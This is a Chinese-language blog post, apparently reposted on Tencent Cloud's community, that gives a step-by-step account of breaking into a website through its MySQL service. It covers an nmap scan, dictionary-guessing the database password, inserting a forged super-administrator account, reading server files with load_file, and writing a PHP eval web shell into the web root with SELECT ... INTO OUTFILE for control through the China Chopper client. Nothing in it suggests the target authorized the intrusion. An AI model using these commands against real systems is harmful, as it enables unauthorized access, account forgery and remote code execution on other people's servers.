前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >一次mysql渗透过程

一次mysql渗透过程

作者头像
C4rpeDime
发布2018-08-28 11:15:14
4670
发布2018-08-28 11:15:14
举报
文章被收录于专栏:黑白安全

1 打开目标站点:www.xxx.com

2 注册账号并登录,大概找下注入点,没找到

3 用namp -A -T4 目标站点扫描开放的服务

   发现mysql等

4 猜弱口令 + 字典  对mysql进行了破译  (运气较好,得到了密码)

5 连接到mysql   找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符

   于是复制了一个超级管理员,用户名及密码复制之前注册的账号

6  打开网站首页,登录,进入管理界面。没找到上传漏洞,也没发现物理路径。

7  在mysql 中尝试读取文件

    select load_file('c:/windows/php.ini');  结果为null

  于是创建新表

create table datainfo (aaa text);

  尝试读取文件到表中

       load data infile 'php.ini' into table datainfo; 提示D:phpStudy4IISMySQLdatafactoryphp.ini not found

  可以看出是用phpStudy4IIS创建的,于是下载一个phpStudy4IIS研究目录

      select load_file('D:/phpStudy4IIS/tools/phpStudy.ini');  发现网站根目录等

     写入一句话

     select '<?php @eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy4IIS/WWW/include/xx.php';

     用菜刀连接:www.xxx.com/include/xx.php   cmd

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-06-156,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档